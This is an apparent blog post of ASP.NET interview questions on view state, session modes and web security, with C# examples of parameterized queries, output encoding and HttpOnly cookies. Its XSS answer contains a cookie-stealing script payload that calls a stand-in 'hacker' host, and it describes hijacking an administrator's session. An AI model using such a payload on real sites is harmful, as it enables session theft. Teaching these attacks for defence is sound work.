2015-03-25

ASP.NET Interview Questions and Answers

1). What is view state in ASP.NET?

Ans: View state is the method that ASP.NET uses to preserve page and control values between postbacks. When the HTML markup for the page is rendered, the current state of the page and the values that must be retained during postback are serialized into base64-encoded strings. This information is then put into the view state hidden field.

2). Is view state a client-side or a server-side state management technique?

Ans: View state is a client-side state management technique.

3). What are the client-side state management techniques supported by ASP.NET?

Ans: View state
Control state
Hidden fields
Cookies
Query strings

4). Is view state used by an ASP.NET page automatically, or do we need to apply it manually?

Ans: View state is used automatically by the ASP.NET page framework to persist information that must be preserved between postbacks.


5). When can you use (take advantage of) view state? Or: what can you do with view state?

Ans: a) Keep values between postbacks without storing them in session state or in a user profile.
b) Store the values of page or control properties that you define.
c) Create a custom view state provider that lets you store view state information in a SQL Server database or in another data store.

6). What are the advantages of using view state?

Ans: No server resources are required: The view state is contained in a structure within the page code.
Simple implementation: View state does not require any custom programming to use. It is on by default to maintain state data on controls.
Enhanced security features: The values in view state are hashed, compressed, and encoded for Unicode implementations, which provides more security than using hidden fields.

7). What are the limitations of view state?

Ans: Limitations:
Because view state is stored in the page, it results in a larger total page size.
ASP.NET uses view state only with page and control properties.
View state isn't a good place to store sensitive information that the client shouldn't be allowed to see.
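
The last limitation follows from question 1: base64 is an encoding, so anyone holding the hidden field's value can read it back, and the hash mentioned in question 6 guards against tampering, not against reading. The sketch below is an added example, not code from the original post; it assumes a .NET Framework console project referencing System.Web, and the stored value is constructed.

```csharp
// Added example. Assumes .NET Framework with a reference to System.Web.
using System;
using System.Text;
using System.Web.UI;

static class ViewStateDemo
{
    // ObjectStateFormatter is the serializer ASP.NET uses for view state;
    // its output is a base64 string like the one in the hidden field.
    public static string Encode(object state)
    {
        return new ObjectStateFormatter().Serialize(state);
    }

    // Reading the value back needs no key or secret of any kind.
    public static object Decode(string base64State)
    {
        return new ObjectStateFormatter().Deserialize(base64State);
    }

    static void Main()
    {
        // Constructed sample standing in for data a page stored in ViewState.
        var state = new Pair("DiscountCode", "STAFF-ONLY-50");
        string field = Encode(state);
        Console.WriteLine("Hidden field value: " + field);

        var decoded = (Pair)Decode(field);
        Console.WriteLine("Recovered: {0} = {1}", decoded.First, decoded.Second);

        // The decoded bytes carry the string itself, so even a plain base64
        // decoder with no knowledge of the format exposes the value.
        string raw = Encoding.UTF8.GetString(Convert.FromBase64String(field));
        Console.WriteLine("Plaintext visible in raw bytes: " + raw.Contains("STAFF-ONLY-50"));
    }
}
```

Where a page must round-trip such a value, keep it in server-side session state, or turn on view state encryption with the ViewStateEncryptionMode page setting.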



11). What are the session modes available in ASP.NET?
Ans: 
Off
InProc
StateServer(Out-Proc)
SQLServer
Custom

12). What is the default session mode in ASP.NET?

Ans: InProc

13). What are the disadvantages of using InProc session mode?

Ans: It stores session information in the current Application Domain, so the data is lost if we restart the server.

14). Which session mode is the only one that supports the Session_End() event?

Ans: Session_End() event is supported by InProc mode only.

15). What do you understand by StateServer (Out-Proc) mode?

Ans: StateServer session mode is also called Out-Proc session mode. StateServer uses a stand-alone Windows Service which is independent of IIS and can also be run on a separate server. This session state is totally managed by aspnet_state.exe. This server may run on the same system, but it's outside of the main application domain where your web application is running. This means if you restart your ASP.NET process, your session data will still be alive.

16). Under StateServer (Out-Proc) mode, what manages the session state?

Ans: aspnet_state.exe

17). What are the advantages and disadvantages of StateServer (Out-Proc) session mode?

Ans: Advantages:
It keeps data separate from IIS so any issues with IIS will not hamper session data.
It is useful in web farm and web garden scenarios.
Disadvantages:
Process is slow due to serialization and de-serialization.
State Server always needs to be up and running.

18). Under SQLServer session mode, where is the session data stored?

Ans: In SQLServer session mode, session data is serialized and stored in a SQL Server database.

19). What is the big disadvantage of SQLServer session mode?

Ans: The main disadvantage of the SQLServer session mode storage method is the overhead associated with data serialization and de-serialization.

20). What are the advantages and disadvantages of SQLServer session mode?

Ans: Advantages:
Session data is not affected if we restart IIS.
The most reliable and secure session management.
It keeps data in a central location that is easily accessible from other applications.
Very useful in web farms and web garden scenarios.
Disadvantages:
Processing is very slow in nature.
Object serialization and de-serialization creates overhead for the application.
As the session data is handled in a different server, we have to take care of SQL Server. It should be always up and running.



ASP.NET SECURITY INTERVIEW QUESTIONS SET-1

Q 1:- What will you do to make your code more secure?
Ans:- I will review my code from the beginning and understand the security issues that are possible in the code; after that I will resolve them.

Q 2:- How much time will you set for a review? Is there any time limit if you are not finding security issues?

Ans:- I will set a reasonable time limit on my review, and then optimize my review for this limit. If I find myself spending too much time in any one area (especially if it is not a high-priority area or objective), then I flag it for later review and move on.

Q 3:- What will you do if you do not have much time for an (ASP.NET project) security review?

Ans:- I will limit my reviews to small, manageable pieces of code. This allows me to finish quickly, stay focused, and find a larger number of security issues in the code I am examining.

Q 4:- What is the difference between Authentication and Authorization?

Ans:- Authentication means validating users. In this step, we verify user credentials to check whether the person trying to log in is the right one or not.
Authorization on the other hand is keeping track of what the current user is allowed to see and what should be hidden from him.

Q 5:- What do you understand by SQL Injection attack?

Ans:- A SQL injection attack occurs when untrusted input can modify the logic of a SQL query in unexpected ways.

Q 6:- What will you do to prevent SQL injection?

Ans:- I will use parameterized and typed stored procedures.
The typed SQL parameter checks the type and length of the input, and it ensures that the userName input value is treated as a literal value and not as executable code in the database.

Q 7:- If you are not using stored procedures and are using simple SQL statements instead, what will you do to prevent SQL injection?

Ans:- If the code does not use stored procedures, make sure that it uses parameters in the SQL statements it constructs, as shown in the following example.
select status from Users where UserName=@userName
I will check that the code does not use the following approach, where the input is used directly to construct the executable SQL statement by using string concatenation.
string sql = "select status from Users where UserName='"
+ txtUserName.Text + "'";
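
The parameterized statement from this answer, with the typed and length-limited parameter described in question 6, can be written as follows. This is an added example, not code from the original post: the NVarChar type, the length of 50 and the class and method names are assumptions, and Main only builds the command, so it runs without a database.

```csharp
// Added example. Uses System.Data.SqlClient; Main needs no database.
using System;
using System.Data;
using System.Data.SqlClient;

static class UserStatusQuery
{
    const int MaxUserNameLength = 50; // assumed width of Users.UserName

    // The statement text is a constant; the input travels only as a parameter value.
    public static SqlCommand Build(SqlConnection connection, string userName)
    {
        // Reject over-long input explicitly instead of relying on the parameter size.
        if (userName == null || userName.Length > MaxUserNameLength)
            throw new ArgumentException("userName is missing or too long");

        var command = new SqlCommand(
            "select status from Users where UserName=@userName", connection);
        command.Parameters.Add("@userName", SqlDbType.NVarChar, MaxUserNameLength).Value = userName;
        return command;
    }

    // How a page would run it; the connection string is supplied by the caller.
    public static object GetStatus(string connectionString, string userName)
    {
        using (var connection = new SqlConnection(connectionString))
        using (var command = Build(connection, userName))
        {
            connection.Open();
            return command.ExecuteScalar();
        }
    }

    static void Main()
    {
        string input = "O'Brien"; // constructed input containing a quote character
        using (var command = Build(null, input))
        {
            Console.WriteLine("Statement: " + command.CommandText);
            Console.WriteLine("Parameter: " + command.Parameters["@userName"].Value);
        }
        // For contrast, the concatenated form from the answer above: the quote
        // in the input ends the string literal and changes the statement itself.
        Console.WriteLine("Concatenated: select status from Users where UserName='" + input + "'");
    }
}
```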

Q 8:- What do you understand by XSS?

Ans:- Cross-site scripting (also known as XSS or CSS) 

Q 9:- What is Cross-site scripting (XSS)?

Ans:- Cross Site Scripting (or XSS) is one of the most common application-layer web attacks. XSS commonly targets scripts embedded in a page which are executed on the client-side (in the user’s web browser) rather than on the server-side. 

Example 1.

For example, the HTML snippet:
<title>Example document: %(title)</title>

is intended to illustrate a template snippet that, if the variable title has value Cross-Site Scripting, results in the following HTML being emitted to the browser:
<title>Example document: XSS Doc</title>
Consider a site containing a search field that does not have proper input sanitizing, and a crafted search query looking something like this:
<SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;</SCRIPT>
Sitting on the other end, at the web server, you will be receiving hits where after a double space is the user's cookie. You might strike lucky if an administrator clicks the link, allowing you to steal their session ID and hijack the session.
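
Two server-side defenses against the scenario above are encoding the value when it is written into the page and marking the session cookie HttpOnly so that document.cookie cannot read it. The sketch below is an added example, not code from the original post; it assumes a .NET Framework project referencing System.Web, and the class name, cookie name and input are constructed.

```csharp
// Added example. Assumes .NET Framework with a reference to System.Web.
using System;
using System.Web;

static class XssDefenses
{
    // The template from Example 1 above.
    const string Template = "<title>Example document: %(title)</title>";

    // Before: the value is substituted verbatim, so any markup in it
    // becomes part of the page the browser parses.
    public static string RenderRaw(string title)
    {
        return Template.Replace("%(title)", title);
    }

    // After: the value is HTML-encoded at output time, so <, >, & and
    // quotes reach the browser as text rather than as tags.
    public static string RenderEncoded(string title)
    {
        return Template.Replace("%(title)", HttpUtility.HtmlEncode(title));
    }

    // A cookie flagged HttpOnly is not exposed to page script, which removes
    // what the script in the example above reads. Secure limits it to HTTPS.
    public static HttpCookie BuildSessionCookie(string name, string value)
    {
        return new HttpCookie(name, value) { HttpOnly = true, Secure = true };
    }

    static void Main()
    {
        // Constructed input: harmless markup that closes the title element.
        string input = "</title><b>injected markup</b>";

        Console.WriteLine("Raw:     " + RenderRaw(input));
        Console.WriteLine("Encoded: " + RenderEncoded(input));

        HttpCookie cookie = BuildSessionCookie("AppSession", "constructed-value");
        Console.WriteLine("{0}: HttpOnly={1}, Secure={2}",
            cookie.Name, cookie.HttpOnly, cookie.Secure);
    }
}
```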

Q 10:- What is the difference between Windows and Forms Authentication?

Ans:- Windows Authentication: is provided so that web pages can make use of the local Windows users and groups. In it, the actual Windows login name and password are used for authentication.

Forms Authentication: Under Forms Authentication, users are able to create their own login name and password. It is basically a cookie-based authentication system which stores the login name and password in a database file.
